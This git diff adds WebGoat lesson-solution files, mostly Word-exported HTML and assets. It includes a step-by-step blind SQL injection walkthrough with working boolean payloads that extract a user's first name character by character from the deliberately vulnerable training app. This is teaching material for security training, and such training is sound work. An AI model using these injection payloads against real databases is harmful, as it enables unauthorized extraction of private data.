+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="3074"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Lesson Plan Title:</span></b><span
+style='font-family:"Arial","sans-serif"'> How to Perform Blind SQL Injection <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Concept / Topic To Teach: <o:p></o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>SQL injection
+attacks represent a serious threat to any database-driven site. The methods behind
+an attack are easy to learn and the damage caused can range from considerable
+to complete system compromise. Despite these risks an incredible number of
+systems on the internet are susceptible to this form of attack. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Not only is
+it a threat easily instigated, it is also a threat that, with a little
+common-sense and forethought, can be almost totally prevented. This lesson will
+show the student several examples of SQL injection.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>It is always
+good practice to sanitize all input data, especially data that will used in OS
+command, scripts, and database queries.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>General Goal(s): <o:p></o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The user
+should be able to view all records in the specified table.<span
+style='mso-spacerun:yes'>  </span>The user could add new records or modify
+existing records.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>From the hints </span></b><b
+style='mso-bidi-font-weight:normal'><span style='font-family:Wingdings;
+mso-ascii-font-family:Arial;mso-hansi-font-family:Arial;mso-bidi-font-family:
+Arial;mso-char-type:symbol;mso-symbol-font-family:Wingdings'><span
+style='mso-char-type:symbol;mso-symbol-font-family:Wingdings'>J</span></span></b><b
+style='mso-bidi-font-weight:normal'><span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Compound SQL
+statements can be made by joining multiple tests with keywords like AND and OR.
+Create a SQL statement that you can use as a true/false test and then select
+the first character of the target element and do a start narrowing down the
+character using &gt; and &lt;<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The backend
+database is Microsoft Access. Keep that in mind if you research SQL functions
+on the Internet since different databases use some different functions and
+syntax.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This is the
+code for the query being built and issued by WebGoat:<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&quot;SELECT
+* FROM user_data WHERE userid = &quot; + accountNumber<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The
+application is taking your input and inserting it at the end of a pre-formed
+SQL command. You will need to make use of the following SQL functions: <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>SELECT -
+query for your target data and get a string <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>mid(string,
+start, length) - returns a substring of string starting at the start character
+and going for length characters <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>asc(string)
+will return the ascii value of the first character in string <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&gt; and &lt;
+- once you have a character's value, compare it to a choosen one<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Example: is
+the first character of the first_name of userid 15613 less than 'M' (ascii 77)?
+<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>101 AND (asc(
+mid((SELECT first_name FROM user_data WHERE userid=15613) , 1 , 1) ) &lt; 77 );
+<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>If you get
+back that account number is valid, then yes. If get back that the number
+isinvalid then answer is no.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Another
+example: is the second character of the first_name of userid 15613 greater than
+'m' (ascii 109)? <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>101 AND (asc(
+mid((SELECT first_name FROM user_data WHERE userid=15613) , 2 , 1) ) &gt; 109
+); <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>If you get back
+that account number is valid, then yes. If get back that the number is invalid
+then answer is no.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_1419" o:spid="_x0000_i1030" type="#_x0000_t75"
+ style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image013.jpg" v:shapes="Picture_x0020_1419"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 16<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>For the
+query: 101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid=15613)
+, 1 , 1) ) &lt; 77 ); you will get a “Account number is valid”. If the
+character is bigger then the value you get an invalid account error message.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1420"
+ o:spid="_x0000_i1029" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image014.jpg" v:shapes="Picture_x0020_1420"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Invalid account number<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>You can
+change the &lt; to = to make sure that you have the correct value.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This results
+in the query 101 AND (asc( mid((SELECT first_name FROM user_data WHERE
+userid=15613) , 1 , 1) ) = 74 );<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1421"
+ o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image015.jpg" v:shapes="Picture_x0020_1421"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> First character<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>So you know
+that ascii(74) is capital J. Now do the same for the second and all other
+characters.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The query for
+the second character: 101 AND (asc( mid((SELECT first_name FROM user_data WHERE
+userid=15613) , 2 , 1) ) = 111 );<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Ascii(111) =
+o, so you have now Jo.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1422" o:spid="_x0000_i1027"
+ type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image007.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image016.jpg" v:shapes="Picture_x0020_1422"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>For the third
+character: 101 AND (asc( mid((SELECT first_name FROM user_data WHERE
+userid=15613) , 3 , 1) ) = 101 ); Ascii(101) = e<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>For the
+fourth character: 101 AND (asc( mid((SELECT first_name FROM user_data WHERE
+userid=15613) , 4 , 1) ) = 115 ); Ascii(115) = s<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>For the fifth
+character: 101 AND (asc( mid((SELECT first_name FROM user_data WHERE
+userid=15613) , 5 , 1) ) = 112); Ascii(112) = p<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>For the sixth
+character: 101 AND (asc( mid((SELECT first_name FROM user_data WHERE
+userid=15613) , 6 , 1) ) = 104); Ascii(104) = h<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>So the name
+that you found is Joesph. Enter this in the text field to complete this lesson.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1423"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image009.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image017.jpg" v:shapes="Picture_x0020_1423"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>4</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Enter the name Joesph<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1424"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image011.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image018.jpg" v:shapes="Picture_x0020_1424"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>5</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 16 Completed<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/filelist.xml b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/filelist.xml
new file mode 100644
index 000000000..085ceea56
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/filelist.xml
@@ -0,0 +1,18 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../BlindSqlInjection.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image013.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image014.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image015.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image016.jpg"/>
+ <o:File HRef="image009.png"/>
+ <o:File HRef="image017.jpg"/>
+ <o:File HRef="image011.png"/>
+ <o:File HRef="image018.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image001.png b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image001.png
new file mode 100644
index 000000000..5fef4d85b
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image003.png b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image003.png
new file mode 100644
index 000000000..950942ed9
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image005.png b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image005.png
new file mode 100644
index 000000000..8c3ee5181
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image007.png b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image007.png
new file mode 100644
index 000000000..54ea1bcb2
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image009.png b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image009.png
new file mode 100644
index 000000000..3668266c4
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image009.png differ
diff --git a/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image011.png b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image011.png
new file mode 100644
index 000000000..9987542b3
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image011.png differ
diff --git a/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image013.jpg b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image013.jpg
new file mode 100644
index 000000000..f5c8d4841
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image013.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image014.jpg b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image014.jpg
new file mode 100644
index 000000000..68702bb41
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image014.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image015.jpg b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image015.jpg
new file mode 100644
index 000000000..b6e84a5fe
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image015.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image016.jpg b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image016.jpg
new file mode 100644
index 000000000..93a58e837
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image016.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image017.jpg b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image017.jpg
new file mode 100644
index 000000000..6055cba63
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image017.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image018.jpg b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image018.jpg
new file mode 100644
index 000000000..2e2bf3fc5
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/image018.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/themedata.thmx b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/BlindSqlInjection_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/CSRF.html b/main/project/WebContent/lesson_solutions/CSRF.html
new file mode 100644
index 000000000..f8f7b0a4e
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/CSRF.html
@@ -0,0 +1,868 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/CSRF_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/CSRF_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>3</o:Revision>
+  <o:TotalTime>1193</o:TotalTime>
+  <o:Created>2007-07-12T11:07:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:19:00Z</o:LastSaved>
+  <o:Pages>2</o:Pages>
+  <o:Words>471</o:Words>
+  <o:Characters>2690</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>22</o:Lines>
+  <o:Paragraphs>6</o:Paragraphs>
+  <o:CharactersWithSpaces>3155</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/CSRF_files/themedata.thmx">
+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/CSRF_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:Zoom>90</w:Zoom>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
